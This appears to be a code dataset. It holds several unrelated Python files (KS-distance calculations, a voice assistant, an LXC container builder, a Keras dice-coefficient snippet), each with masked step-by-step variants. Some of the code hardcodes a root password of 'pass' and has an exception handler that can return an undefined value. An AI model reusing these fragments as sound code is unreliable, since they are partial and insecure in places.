"step-3": "<mask token>\na = st.norm(0, 1)\nb = st.norm(0.1, 1)\ndomain = n.linspace(-4, 4, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffN = n.abs(avals - bvals).max()\na = st.norm(0, 1)\nb = st.norm(0, 1.2)\ndomain = n.linspace(-4, 4, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffN2 = n.abs(avals - bvals).max()\na = st.uniform(0, 1)\nb = st.uniform(0.05, 1.0)\ndomain = n.linspace(0, 1.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffU = n.abs(avals - bvals).max()\na = st.uniform(0, 1)\nb = st.uniform(-0.05, 1.05)\ndomain = n.linspace(0, 1.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffU2 = n.abs(avals - bvals).max()\nx = n.linspace(0, 20, 100000)\nstep = x[1] - x[0]\n\n\ndef weib(x, nn, a):\n return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)\n\n\nW = weib(x, 1.0, 1.5)\nW_ = W / (W * step).sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, 1.7)\nW2_ = W2 / (W2 * step).sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W_ - W2_).max()\na = st.powerlaw(1.5)\nb = st.powerlaw(1.7)\ndomain = n.linspace(0, 5.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffP = n.abs(avals - bvals).max()\nprint('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,\n diffU2, diffW, diffP)\nlb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7\nx = n.linspace(lb, rb, NE)\nstep = x[1] - x[0]\nW = weib(x, 1.0, shape1)\nW_ = W / (W * step).sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, shape2)\nW2_ = W2 / (W2 * step).sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W__ - W2__).max()\nlb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7\nx = n.linspace(lb, rb, NE)\nstep = x[1] - x[0]\nW = weib(x, 1.0, shape1)\nW_ = W / W.sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, shape2)\nW2_ = W2 / W2.sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W__ - W2__).max()\n",
"step-4": "import numpy as n, pylab as p\nfrom scipy import stats as st\na = st.norm(0, 1)\nb = st.norm(0.1, 1)\ndomain = n.linspace(-4, 4, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffN = n.abs(avals - bvals).max()\na = st.norm(0, 1)\nb = st.norm(0, 1.2)\ndomain = n.linspace(-4, 4, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffN2 = n.abs(avals - bvals).max()\na = st.uniform(0, 1)\nb = st.uniform(0.05, 1.0)\ndomain = n.linspace(0, 1.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffU = n.abs(avals - bvals).max()\na = st.uniform(0, 1)\nb = st.uniform(-0.05, 1.05)\ndomain = n.linspace(0, 1.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffU2 = n.abs(avals - bvals).max()\nx = n.linspace(0, 20, 100000)\nstep = x[1] - x[0]\n\n\ndef weib(x, nn, a):\n return a / nn * (x / nn) ** (a - 1) * n.exp(-(x / nn) ** a)\n\n\nW = weib(x, 1.0, 1.5)\nW_ = W / (W * step).sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, 1.7)\nW2_ = W2 / (W2 * step).sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W_ - W2_).max()\na = st.powerlaw(1.5)\nb = st.powerlaw(1.7)\ndomain = n.linspace(0, 5.05, 10000)\navals = a.cdf(domain)\nbvals = b.cdf(domain)\ndiffP = n.abs(avals - bvals).max()\nprint('distancias de KS para os modelos matematicos:', diffN, diffN2, diffU,\n diffU2, diffW, diffP)\nlb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7\nx = n.linspace(lb, rb, NE)\nstep = x[1] - x[0]\nW = weib(x, 1.0, shape1)\nW_ = W / (W * step).sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, shape2)\nW2_ = W2 / (W2 * step).sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W__ - W2__).max()\nlb, rb, NE, shape1, shape2 = 0, 10, 10000, 1.5, 1.7\nx = n.linspace(lb, rb, NE)\nstep = x[1] - x[0]\nW = weib(x, 1.0, shape1)\nW_ = W / W.sum()\nW__ = n.cumsum(W_)\nW2 = weib(x, 1.0, shape2)\nW2_ = W2 / W2.sum()\nW2__ = n.cumsum(W2_)\ndiffW = n.abs(W__ - W2__).max()\n",
"step-5": "import numpy as n, pylab as p\nfrom scipy import stats as st\na=st.norm(0,1)\nb=st.norm(0.1,1)\ndomain=n.linspace(-4,4,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffN=n.abs(avals-bvals).max()\n\na=st.norm(0,1)\nb=st.norm(0,1.2)\ndomain=n.linspace(-4,4,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffN2=n.abs(avals-bvals).max()\n\na=st.uniform(0,1)\nb=st.uniform(0.05,1.0)\ndomain=n.linspace(0,1.05,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffU=n.abs(avals-bvals).max()\n\na=st.uniform(0,1)\nb=st.uniform(-0.05,1.05)\ndomain=n.linspace(0,1.05,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffU2=n.abs(avals-bvals).max()\n\n#a=st.weibull(1.5)\n#b=st.weibull(1.7)\n#domain=n.linspace(0,1.05,10000)\n#avals=a.cdf(domain)\n#bvals=b.cdf(domain)\n#diffW=n.abs(avals-bvals).max()\n\n#a=st.power(1.5)\n#b=st.power(1.7)\n#domain=n.linspace(0,1.05,10000)\n#avals=a.cdf(domain)\n#bvals=b.cdf(domain)\n#diffP=n.abs(avals-bvals).max()\n\n#x = n.arange(1,100.)/50.\nx=n.linspace(0,20,100000)\nstep=x[1]-x[0]\ndef weib(x,nn,a):\n return (a / nn) * (x / nn)**(a - 1) * n.exp(-(x / nn)**a)\n\n#count, bins, ignored = p.hist(n.random.weibull(5.,1000))\n#x = n.arange(1,100.)/50.\n#scale = count.max()/weib(x, 1., 5.).max()\nW=weib(x, 1., 1.5)\nW_=W/(W*step).sum()\nW__=n.cumsum(W_)\nW2=weib(x, 1., 1.7)\nW2_=W2/(W2*step).sum()\nW2__=n.cumsum(W2_)\ndiffW=n.abs(W_-W2_).max()\n#p.plot(x, W_)\n#p.plot(x, W2_)\n##p.plot(x, weib(x, 1., 5.)*scale)\n#p.show()\n\na=st.powerlaw(1.5)\nb=st.powerlaw(1.7)\ndomain=n.linspace(0,5.05,10000)\navals=a.cdf(domain)\nbvals=b.cdf(domain)\ndiffP=n.abs(avals-bvals).max()\n\nprint(\"distancias de KS para os modelos matematicos:\", diffN,diffN2,diffU,diffU2,diffW,diffP)\n# distancias de KS para os modelos matematicos:\n# 0.0398776116762 0.0439947104098 0.0952338090952 0.047619047619 0.128565475845 0.0460149130584\n\n\n# X = (-n.ln(U))^{1/a}\nlb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7\nx=n.linspace(lb,rb,NE)\nstep=x[1]-x[0]\nW=weib(x, 1., shape1)\nW_=W/((W*step).sum())\nW__=n.cumsum(W_)\nW2=weib(x, 1., shape2)\nW2_=W2/((W2*step).sum())\nW2__=n.cumsum(W2_)\ndiffW=n.abs(W__-W2__).max()\n\n\nlb,rb,NE,shape1,shape2=0,10,10000,1.5,1.7\nx=n.linspace(lb,rb,NE)\nstep=x[1]-x[0]\nW=weib(x, 1., shape1)\nW_=W/((W).sum())\nW__=n.cumsum(W_)\nW2=weib(x, 1., shape2)\nW2_=W2/((W2).sum())\nW2__=n.cumsum(W2_)\ndiffW=n.abs(W__-W2__).max()\n\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import speech_recognition as sr
import pyttsx3
import pywhatkit
import datetime
listner = sr.Recognizer()
engine = pyttsx3.init()
#change voices
voices = engine.getProperty('voices')
engine.setProperty('voice',voices[10].id)
rate = engine.getProperty('rate')
engine.setProperty('rate', 150)
#for machine to say
def talk(text):
engine.say(text)
engine.runAndWait()
def takeCommand():
try:
with sr.Microphone() as sc:
print("Listening......")
vc = listner.listen(sc)
cmd = listner.recognize_google(vc)
cmd = cmd.lower()
if 'alexa' in cmd:
cmd = cmd.replace('alexa','')
except:
pass
return cmd
def run_alexa():
command = takeCommand()
print(command)
if 'play' in command:
song = command.replace('play','')
talk('playing '+song)
pywhatkit.playonyt(song)
if 'time' in command:
time = datetime.datetime.now().strftime('%I:%M %p')
talk('time is '+time)
print(time)
run_alexa()
|
normal
|
{
"blob_id": "c4f437e6f5aaeccb6dd0948c3ed1f1d465bb29ce",
"index": 1200,
"step-1": "<mask token>\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\n<mask token>\n",
"step-2": "<mask token>\nengine.setProperty('voice', voices[10].id)\n<mask token>\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-3": "<mask token>\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-4": "import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-5": "import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\n\n\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\n\n#change voices\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n#for machine to say\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print(\"Listening......\")\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa','')\n except:\n pass\n return cmd\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play','')\n talk('playing '+song)\n pywhatkit.playonyt(song)\n \n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is '+time)\n print(time)\n\nrun_alexa()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
"""
@Description:
@Author : HCQ
@Contact_1: [email protected]
@Project : pytorch
@File : call_test
@Time : 2022/5/24 下午10:19
@Last Modify Time @Version @Desciption
-------------------- -------- -----------
2022/5/24 下午10:19 1.0 None
"""
class Person():
def __call__(self, name):
print("__call__" + " Hello " + name)
def hello(self, name):
print("hello " + name)
person = Person()
person("hcq") # 直接调用call
person.hello("hcq")
|
normal
|
{
"blob_id": "7b1c7228c1fc9501ab857cba62a7e073691e75c9",
"index": 755,
"step-1": "<mask token>\n\n\nclass Person:\n\n def __call__(self, name):\n print('__call__' + ' Hello ' + name)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Person:\n\n def __call__(self, name):\n print('__call__' + ' Hello ' + name)\n\n def hello(self, name):\n print('hello ' + name)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Person:\n\n def __call__(self, name):\n print('__call__' + ' Hello ' + name)\n\n def hello(self, name):\n print('hello ' + name)\n\n\n<mask token>\nperson('hcq')\nperson.hello('hcq')\n",
"step-4": "<mask token>\n\n\nclass Person:\n\n def __call__(self, name):\n print('__call__' + ' Hello ' + name)\n\n def hello(self, name):\n print('hello ' + name)\n\n\nperson = Person()\nperson('hcq')\nperson.hello('hcq')\n",
"step-5": "\"\"\"\n@Description: \n@Author : HCQ\n@Contact_1: [email protected]\n@Project : pytorch\n@File : call_test\n@Time : 2022/5/24 下午10:19\n@Last Modify Time @Version @Desciption\n-------------------- -------- -----------\n2022/5/24 下午10:19 1.0 None\n\"\"\"\n\nclass Person():\n def __call__(self, name):\n print(\"__call__\" + \" Hello \" + name)\n\n def hello(self, name):\n print(\"hello \" + name)\n\nperson = Person()\nperson(\"hcq\") # 直接调用call\nperson.hello(\"hcq\")",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from vmgCommanderBase import CommanderBase
from vmgInstallerApt import InstallerApt
from vmgInstallerYum import InstallerYum
from vmgConfigLinux import ConfigLinux
from runCommands import *
import shutil
import os
import time
from vmgLogging import *
from writeFormat import *
from vmgControlVmware import *
from vmgUtils import *
""" Functions to write lines in a .vmx file. """
log = logging.getLogger("vmgen.vmgCommanderLxc")
""" The distribution used for container creation parameters. """
distro = {
"debian":{
"vm":"/home/vmgen/vmware/Debian (lxc)/Debian (lxc).vmx",
"hostname":"root@debian-lxc",
"script":"my-lxc-debian.sh",
"scripts-folder":"../scripts-lxc/debian/"},
"fedora":{
"vm":"/home/vmgen/vmware/Fedora 64-bit/Fedora 64-bit.vmx",
"hostname":"root@fedora-lxc",
"script":"my-lxc-fedora.sh",
"scripts-folder":"../scripts-lxc/fedora/"}
}
installer = {
'debian' : InstallerApt,
'ubuntu' : InstallerApt,
'fedora' : InstallerYum
}
""" Container operating system parameters. """
os_params = {
"fedora-64":{
"os":"fedora",
"version":"14",
"arch":"amd64"},
"fedora":{
"os":"fedora",
"version":"14",
"arch":"x86"},
"debian5-64":{
"os":"debian",
"version":"lenny",
"arch":"amd64"},
"debian5":{
"os":"debian",
"version":"lenny",
"arch":"x86"},
}
""" The path in the VMware machine where the container is created. """
path = "/lxc"
class CommanderLxc(CommanderBase):
def setupHardware(self):
log.info("Creating the hardware configuration...")
self.os = self.data.getSection("hardware").get("os")
self.id = self.data.getSection("hardware").get("vm_id")
# extract the os parameters from the config file
os_type = os_params[self.os]["os"]
ver = os_params[self.os]["version"]
arch = os_params[self.os]["arch"]
self.vm = distro[os_type]["vm"]
self.host = distro[os_type]["hostname"]
folder = distro[os_type]["scripts-folder"]
script = distro[os_type]["script"]
self.config = path + "/" + self.id + "/" + "config." + self.id
self.roots = path + "/" + self.id + "/" + "rootfs." + self.id
self.fstab = path + "/" + self.id + "/" + "fstab." + self.id
# set the user and host used for the SSH connection
setUserHost(self.host)
# power on the auxiliary VMware machine
log.info("\tStarting the virtual machine...")
try_power_on_vm(self.vm)
# set default root password
passwd = "pass"
#self.data.getSection("config").get("root_passwd")
# copy the needed scripts to the virtual machine
log.info("\tCopying the scripts to the virtual machine...")
files = os.listdir(folder)
paths = [os.path.join(folder, f) for f in files]
copyFilesToVM(paths, self.host)
for f in files:
executeCommandSSH("chmod a+x " + f)
# create a temp file containing lines to be appended to the container
# config file
log.info("\tFilling up the network section in the config file...")
temp_file = "eth.tmp"
with open(temp_file, "w") as f:
log.info("\Setting memory and CPUs...")
section = self.data.getSection("hardware")
ram = section.get("ram") + "M"
num_cpu = int(section.get("num_cpu"))
if num_cpu == 1:
cpus = "0"
else:
cpus = "0" + "-" + str(num_cpu - 1)
# TODO: the kernel needs support for the memory controller
writeOption(f, "#lxc.cgroup.memory.limit_in_bytes", ram, False)
writeOption(f, "lxc.cgroup.cpuset.cpus", cpus, False)
# create network interfaces
log.info("\tCreating the network interfaces...")
self.eth_list = getSortedValues(section.get("eths").data)
eth_config = getSortedValues(
self.data.getSection("network").get("eths").data)
for i, eth_pair in enumerate(zip(self.eth_list, eth_config)):
i = str(i)
eth, eth_c = eth_pair
eth_name = eth.get("name")
writeOption(f, "lxc.network.type", "veth", False)
writeOption(f, "lxc.network.link", "br0", False)
writeOption(f, "lxc.network.name", eth_name, False)
writeOption(f, "lxc.network.mtu", "1500", False)
# set IP address
ip_type = eth_c.get("type")
if ip_type == "static":
ip = eth_c.get("address")
mask = getNetmaskCIDR(eth_c.get("network"))
else:
ip = "0.0.0.0"
mask = ""
writeOption(f, "lxc.network.ipv4", ip+mask, False)
if eth.contains("connected"):
writeOption(f, "lxc.network.flags", "up", False)
# set MAC address, if present
mac = eth.get("hw_address")
if mac:
writeOption(f, "lxc.network.hwaddr", mac)
# copy the temp file to the virtual machine
copyFileToVM(temp_file, self.host)
os.remove(temp_file)
# run the script on the virtual machine, to create the container
log.info("\tRun the container creation script...")
executeCommandSSH("./" + script + " " + path + " " + self.id + " " +
ver + " " + arch + " " + passwd)
def setupOperatingSystem(self):
pass
def startVM(self):
""" Start the container. """
log.info("\tStarting the container...")
executeCommandSSH("pushd " + path)
executeCommandSSH("lxc-create" + " -n " + self.id + " -f " + self.config)
# executeCommandSSH("lxc-start" + " -n " + self.id + " -f " + self.config)
def shutdownVM(self):
""" Shutdown the container and the virtual machine. """
log.info("\tStopping the container...")
# executeCommandSSH("lxc-stop" + " -n " + self.id)
executeCommandSSH("lxc-destroy" + " -n " + self.id)
executeCommandSSH("shutdown -h now")
def connectToVM(self):
print "\nEstablishing connection to the VM..."
def disconnectFromVM(self):
print "\nTerminating connection to the VM..."
def setupServices(self):
print "\nInstalling services..."
section = self.data.getSection("services")
self.installPrograms(section)
def setupDeveloperTools(self):
print "\nInstalling developer tools..."
section = self.data.getSection("devel")
self.installPrograms(section)
def setupGuiTools(self):
print "\nInstalling GUI tools..."
section = self.data.getSection("gui")
self.installPrograms(section)
def createArchive(self):
executeCommandSSH("cd " + path)
files = self.config + " " + self.fstab + " " + self.rootfs
arch_name = self.id + ".zip"
executeCommandSSH("zip -r " + arch_name + " " + files)
copyFileFromVM(path + "/" + arch_name, "./", self.host)
return [arch_name, ""]
def getModuleName(self):
return "lxc"
def getConfigInstance(self):
return ConfigLinux(self.data, self.communicator)
def getInstallerInstance(self):
vm_os = self.data.getSection("hardware").get("os")
for k in installer.keys():
if str(k) in vm_os:
return installer[k](self.communicator)
return None
|
normal
|
{
"blob_id": "22fe07a237f2c5f531d189c07596a22df191d038",
"index": 1140,
"step-1": "from vmgCommanderBase import CommanderBase\nfrom vmgInstallerApt import InstallerApt\nfrom vmgInstallerYum import InstallerYum\nfrom vmgConfigLinux import ConfigLinux\nfrom runCommands import *\nimport shutil\nimport os\nimport time\nfrom vmgLogging import *\nfrom writeFormat import *\nfrom vmgControlVmware import *\nfrom vmgUtils import *\n\n\"\"\" Functions to write lines in a .vmx file. \"\"\"\nlog = logging.getLogger(\"vmgen.vmgCommanderLxc\")\n\n\"\"\"\tThe distribution used for container creation parameters. \"\"\"\ndistro = {\n\t\"debian\":{\n\t\t\"vm\":\"/home/vmgen/vmware/Debian (lxc)/Debian (lxc).vmx\",\n\t\t\"hostname\":\"root@debian-lxc\",\n\t\t\"script\":\"my-lxc-debian.sh\",\n\t\t\"scripts-folder\":\"../scripts-lxc/debian/\"},\n\t\"fedora\":{\n\t\t\"vm\":\"/home/vmgen/vmware/Fedora 64-bit/Fedora 64-bit.vmx\",\n\t\t\"hostname\":\"root@fedora-lxc\",\n\t\t\"script\":\"my-lxc-fedora.sh\",\n\t\t\"scripts-folder\":\"../scripts-lxc/fedora/\"}\n}\n\ninstaller = {\n\t'debian' : InstallerApt,\n\t'ubuntu' : InstallerApt,\n\t'fedora' : InstallerYum\n}\n\n\"\"\" Container operating system parameters. \"\"\"\nos_params = {\n\t\t\"fedora-64\":{\n\t\t\t\"os\":\"fedora\",\n\t\t\t\"version\":\"14\", \n\t\t\t\"arch\":\"amd64\"},\n\t\t\"fedora\":{\n\t\t\t\"os\":\"fedora\",\n\t\t\t\"version\":\"14\", \n\t\t\t\"arch\":\"x86\"},\n\t\t\"debian5-64\":{\n\t\t\t\"os\":\"debian\",\n\t\t\t\"version\":\"lenny\", \n\t\t\t\"arch\":\"amd64\"},\n\t\t\"debian5\":{\n\t\t\t\"os\":\"debian\",\n\t\t\t\"version\":\"lenny\", \n\t\t\t\"arch\":\"x86\"},\n}\n\n\"\"\"\tThe path in the VMware machine where the container is created. \"\"\"\npath = \"/lxc\"\n\nclass CommanderLxc(CommanderBase):\n\n\tdef setupHardware(self):\n\t\tlog.info(\"Creating the hardware configuration...\")\n\n\t\tself.os = self.data.getSection(\"hardware\").get(\"os\")\n\t\tself.id = self.data.getSection(\"hardware\").get(\"vm_id\")\n\n\t\t# extract the os parameters from the config file\n\t\tos_type = os_params[self.os][\"os\"]\n\t\tver = os_params[self.os][\"version\"]\n\t\tarch = os_params[self.os][\"arch\"]\n\n\t\tself.vm = distro[os_type][\"vm\"]\n\t\tself.host = distro[os_type][\"hostname\"]\n\t\tfolder = distro[os_type][\"scripts-folder\"]\n\t\tscript = distro[os_type][\"script\"]\n\n\t\tself.config = path + \"/\" + self.id + \"/\" + \"config.\" + self.id\n\t\tself.roots = path + \"/\" + self.id + \"/\" + \"rootfs.\" + self.id\n\t\tself.fstab = path + \"/\" + self.id + \"/\" + \"fstab.\" + self.id\n\n\t\t# set the user and host used for the SSH connection\n\t\tsetUserHost(self.host)\n\n\t\t# power on the auxiliary VMware machine\n\t\tlog.info(\"\\tStarting the virtual machine...\")\n\t\ttry_power_on_vm(self.vm)\n\n\t\t# set default root password\n\t\tpasswd = \"pass\" \n\t\t#self.data.getSection(\"config\").get(\"root_passwd\")\n\n\t\t# copy the needed scripts to the virtual machine\n\t\tlog.info(\"\\tCopying the scripts to the virtual machine...\")\n\t\tfiles = os.listdir(folder)\n\t\tpaths = [os.path.join(folder, f) for f in files]\n\t\tcopyFilesToVM(paths, self.host)\n\t\tfor f in files:\n\t\t\texecuteCommandSSH(\"chmod a+x \" + f)\n\n\t\t# create a temp file containing lines to be appended to the container\n\t\t# config file\n\t\tlog.info(\"\\tFilling up the network section in the config file...\")\n\t\ttemp_file = \"eth.tmp\"\n\t\twith open(temp_file, \"w\") as f:\n\t\t\tlog.info(\"\\Setting memory and CPUs...\")\n\t\t\tsection = self.data.getSection(\"hardware\")\n\t\t\tram = section.get(\"ram\") + \"M\"\n\t\t\tnum_cpu = int(section.get(\"num_cpu\"))\n\n\t\t\tif num_cpu == 1:\n\t\t\t\tcpus = \"0\"\n\t\t\telse:\n\t\t\t\tcpus = \"0\" + \"-\" + str(num_cpu - 1)\n\n\t\t\t# TODO: the kernel needs support for the memory controller\n\t\t\twriteOption(f, \"#lxc.cgroup.memory.limit_in_bytes\", ram, False)\n\t\t\twriteOption(f, \"lxc.cgroup.cpuset.cpus\", cpus, False)\n\n\t\t\t# create network interfaces\n\t\t\tlog.info(\"\\tCreating the network interfaces...\")\n\t\t\tself.eth_list = getSortedValues(section.get(\"eths\").data)\n\t\t\teth_config = getSortedValues(\n\t\t\t\t\tself.data.getSection(\"network\").get(\"eths\").data)\n\t\t\tfor i, eth_pair in enumerate(zip(self.eth_list, eth_config)):\n\t\t\t\ti = str(i)\n\t\t\t\teth, eth_c = eth_pair\n\n\t\t\t\teth_name = eth.get(\"name\")\n\t\t\t\twriteOption(f, \"lxc.network.type\", \"veth\", False)\n\n\t\t\t\twriteOption(f, \"lxc.network.link\", \"br0\", False)\n\n\t\t\t\twriteOption(f, \"lxc.network.name\", eth_name, False)\n\t\t\t\twriteOption(f, \"lxc.network.mtu\", \"1500\", False)\n\n\t\t\t\t# set IP address\n\t\t\t\tip_type = eth_c.get(\"type\")\n\t\t\t\tif ip_type == \"static\":\n\t\t\t\t\tip = eth_c.get(\"address\")\n\t\t\t\t\tmask = getNetmaskCIDR(eth_c.get(\"network\"))\n\t\t\t\telse:\n\t\t\t\t\tip = \"0.0.0.0\"\n\t\t\t\t\tmask = \"\"\n\n\t\t\t\twriteOption(f, \"lxc.network.ipv4\", ip+mask, False)\n\n\t\t\t\tif eth.contains(\"connected\"):\n\t\t\t\t\twriteOption(f, \"lxc.network.flags\", \"up\", False)\n\n\t\t\t\t# set MAC address, if present\n\t\t\t\tmac = eth.get(\"hw_address\")\n\t\t\t\tif mac:\n\t\t\t\t\twriteOption(f, \"lxc.network.hwaddr\", mac)\n\n\t\t# copy the temp file to the virtual machine\n\t\tcopyFileToVM(temp_file, self.host)\n\t\tos.remove(temp_file)\n\n\t\t# run the script on the virtual machine, to create the container\n\t\tlog.info(\"\\tRun the container creation script...\")\n\t\texecuteCommandSSH(\"./\" + script + \" \" + path + \" \" + self.id + \" \" + \n\t\t\tver + \" \" + arch + \" \" + passwd)\n\n\n\tdef setupOperatingSystem(self):\n\t\tpass\n\t\t\n\tdef startVM(self):\n\t\t\"\"\" Start the container. \"\"\"\n\t\tlog.info(\"\\tStarting the container...\")\n\t\texecuteCommandSSH(\"pushd \" + path)\n\t\texecuteCommandSSH(\"lxc-create\" + \" -n \" + self.id + \" -f \" + self.config)\n#\t\texecuteCommandSSH(\"lxc-start\" + \" -n \" + self.id + \" -f \" + self.config)\n\n\tdef shutdownVM(self):\n\t\t\"\"\" Shutdown the container and the virtual machine. \"\"\"\n\t\tlog.info(\"\\tStopping the container...\")\n#\t\texecuteCommandSSH(\"lxc-stop\" + \" -n \" + self.id)\n\t\texecuteCommandSSH(\"lxc-destroy\" + \" -n \" + self.id)\n\t\texecuteCommandSSH(\"shutdown -h now\")\n\n\tdef connectToVM(self):\n\t\tprint \"\\nEstablishing connection to the VM...\"\n\n\tdef disconnectFromVM(self):\n\t\tprint \"\\nTerminating connection to the VM...\"\n\n\tdef setupServices(self):\n\t\tprint \"\\nInstalling services...\"\n\t\tsection = self.data.getSection(\"services\")\n\t\tself.installPrograms(section)\n\n\tdef setupDeveloperTools(self):\n\t\tprint \"\\nInstalling developer tools...\"\n\t\tsection = self.data.getSection(\"devel\")\n\t\tself.installPrograms(section)\n\n\tdef setupGuiTools(self):\n\t\tprint \"\\nInstalling GUI tools...\"\n\t\tsection = self.data.getSection(\"gui\")\n\t\tself.installPrograms(section)\n\n\tdef createArchive(self):\n\t\texecuteCommandSSH(\"cd \" + path)\n\t\tfiles = self.config + \" \" + self.fstab + \" \" + self.rootfs\n\n\t\tarch_name = self.id + \".zip\"\n\n\t\texecuteCommandSSH(\"zip -r \" + arch_name + \" \" + files)\n\t\tcopyFileFromVM(path + \"/\" + arch_name, \"./\", self.host)\n\n\t\treturn [arch_name, \"\"]\n\n\tdef getModuleName(self):\n\t\treturn \"lxc\"\n\n\tdef getConfigInstance(self):\n\t\treturn ConfigLinux(self.data, self.communicator)\n\n\tdef getInstallerInstance(self):\n\t\tvm_os = self.data.getSection(\"hardware\").get(\"os\")\n\t\tfor k in installer.keys():\n\t\t\tif str(k) in vm_os:\n\t\t\t\treturn installer[k](self.communicator)\n\t\treturn None",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Copyright (c) 2020 Hai Nguyen
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
import tensorflow.keras.backend as K
def dice_coef(y_true, y_pred):
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
union = K.sum(y_true_f) + K.sum(y_pred_f)
return (2. * intersection + smooth) / (union + smooth)
def true_pos(y_true, y_pred):
smooth = 1
